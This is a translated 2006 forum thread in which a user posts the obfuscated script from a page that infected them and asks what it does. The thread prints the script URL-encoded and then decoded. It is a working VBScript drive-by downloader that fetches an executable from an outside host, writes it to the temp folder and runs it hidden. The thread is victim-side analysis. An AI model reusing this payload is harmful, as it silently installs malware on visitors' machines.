Title: I've been hit by a web page virus. Here is the code; can anyone make sense of it?
盖茨他爹
I've been hit by a web page virus. Here is the code; can anyone make sense of it?
<SCRIPT>var Words="%3Chtml%3E%0D%0A %3Cscript language%3D%22VBScript%22%3E%0D%0A    on error resume next%0D%0A    dl %3D %22http%3A%2F%2Fwww%2Eac66%2Ecn%2F88%2Frpp%2Eexe%22%0D%0A    Set df %3D document%2EcreateElement%28%22object%22%29%0D%0A    df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A    str%3D%22Microsoft%2EXMLHTTP%22%0D%0A    Set x %3D df%2ECreateObject%28str%2C%22%22%29%0D%0A    a1%3D%22Ado%22%0D%0A    a2%3D%22db%2E%22%0D%0A    a3%3D%22Str%22%0D%0A    a4%3D%22eam%22%0D%0A    str1%3Da1%26a2%26a3%26a4%0D%0A    str5%3Dstr1%0D%0A    set S %3D df%2Ecreateobject%28str5%2C%22%22%29%0D%0A    S%2Etype %3D 1%0D%0A    str6%3D%22GET%22%0D%0A    x%2EOpen str6%2C dl%2C False%0D%0A    x%2ESend%0D%0A    fname1%3D%22g0ld%2Ecom%22%0D%0A    set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0A    set tmp %3D F%2EGetSpecialFolder%282%29 %0D%0A    fname1%3D F%2EBuildPath%28tmp%2Cfname1%29%0D%0A    S%2Eopen%0D%0A    S%2Ewrite x%2EresponseBody%0D%0A    S%2Esavetofile fname1%2C2%0D%0A    S%2Eclose%0D%0A    set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29%0D%0A    Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A    %3C%2Fscript%3E%0D%0A    %3Chead%3E%0D%0A    %3Ctitle%3EOh%2Cmy god%21   Goldsun%5Bat%5D84823714%3C%2Ftitle%3E%0D%0A    %3C%2Fhead%3E%3Cbody%3E%0D%0A%09%3Ccenter%3EYou DO it%21%3C%2Fcenter%3E%0D%0A    %3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
2006-08-23 18:07
论坛
..................

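The sun rises in the east, and I alone am undefeated! Whatever you do, you have to be able to endure loneliness; in any field it takes more than ten years of accumulated experience to become an expert.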
2006-08-23 18:17
渚薰
%XX
This kind of encoding is URL encoding.
You can take the string that Words refers to and output it with Server.HTMLEncode(Words); then you will be able to read it.

Personal AJAX technology site: http://www. I won't mind you being annoying, I'll only mind you not being annoying enough!
2006-08-23 18:42
盖茨他爹

I've roughly converted it. The red part was originally a single line; to make it easier to read, I split it into many lines.

[QUOTE]<SCRIPT>
var Words="<html>
<script language='VBScript'>
on error resume next
dl = 'http://www.ac66.cn/88/rpp.exe'
Set df = document.createElement('object')
df.setAttribute 'classid', 'clsid:BD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36'
str='Microsoft.XMLHTTP'
Set x = df.CreateObject(str,'')
a1='Ado'
a2='db.'
a3='Str'
a4='eam'
str1=a1%26a2%26a3%26a4
str5=str1
set S = df.createobject(str5,'')
S.type = 1
str6='GET'
x.Open str6, dl, False
x.Send
fname1='g0ld.com'
set F = df.createobject('Scripting.FileSystemObject','')
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject('Shell.Application','')
Q.ShellExecute fname1,'','','open',0
</script>
<head>
<title>Oh,my god! Goldsun[at]84823714</title>
</head><body>
%09<center>You DO it!</center>
</body></html>
";
document.write(unescape(Words))</SCRIPT>[/QUOTE]

2006-08-23 18:44
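The decoding discussed in the replies above can be done as plain text, without letting a browser run document.write. The following Python sketch is an added example, not part of the original thread: it percent-decodes a Words string and lists the URLs, CLSID and CreateObject ProgIDs it references, resolving the `&` string concatenation. The sample input is constructed in the same shape as the posted script, with a placeholder URL; the function names are assumptions of this example.

```python
import re

# Constructed sample shaped like the posted script; the URL is a placeholder.
SAMPLE = (
    '<SCRIPT>var Words="%3Cscript language%3D%22VBScript%22%3E%0D%0A'
    'dl %3D %22http%3A%2F%2Fexample%2Einvalid%2Fa%2Eexe%22%0D%0A'
    'df%2EsetAttribute %22classid%22%2C '
    '%22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A'
    'a1%3D%22Ado%22%0D%0Aa2%3D%22db%2E%22%0D%0Aa3%3D%22Str%22%0D%0A'
    'a4%3D%22eam%22%0D%0Astr1%3Da1%26a2%26a3%26a4%0D%0A'
    'set S %3D df%2Ecreateobject%28str1%2C%22%22%29%0D%0A'
    'set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29'
    '%0D%0A%3C%2Fscript%3E";document.write(unescape(Words))</SCRIPT>'
)

def js_unescape(s):
    """Single-pass text equivalent of JavaScript unescape(): %XX and %uXXXX."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def resolve(expr, env):
    """Evaluate "literal" & var & ... from known string variables, else None."""
    parts = []
    for tok in (t.strip() for t in expr.split("&")):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            parts.append(tok[1:-1])
        elif tok.lower() in env:
            parts.append(env[tok.lower()])
        else:
            return None  # not a pure string expression; leave unresolved
    return "".join(parts)

def analyze(page):
    """Decode the Words payload as text only and list what it references."""
    m = re.search(r'var\s+Words\s*=\s*"([^"]*)"', page)
    if not m:
        return None
    text = js_unescape(m.group(1))
    env = {}  # VBScript string variables seen so far (names are case-insensitive)
    for name, rhs in re.findall(r'(?im)^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$', text):
        value = resolve(rhs, env)
        if value is not None:
            env[name.lower()] = value
    args = re.findall(r'(?i)createobject\(\s*([^,)]+)', text)
    return {
        "urls": list(dict.fromkeys(re.findall(r'https?://[^\s"\']+', text))),
        "clsids": re.findall(r'(?i)clsid:([0-9a-f-]{36})', text),
        "progids": [resolve(a, env) or a.strip() for a in args],
        "decoded": text,
    }
```

Run over a saved copy of a suspect page, the `progids` list shows object names that were split into fragments to avoid simple string matching, which is also what a content filter has to account for.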
盖茨他爹
It looks like it ultimately goes to this website. I don't understand shell.

http://www.g0ld.com/

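I opened it just now and it seems to carry a virus. It gets past the XP SP2 restrictions to pop up windows, then lures people into installing some kind of software from abroad. If anyone has the ability, teach this guy a lesson.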
2006-08-23 18:46



To join the discussion, please go to the thread on the original site: https://bbs.bccn.net/thread-85755-1-1.html



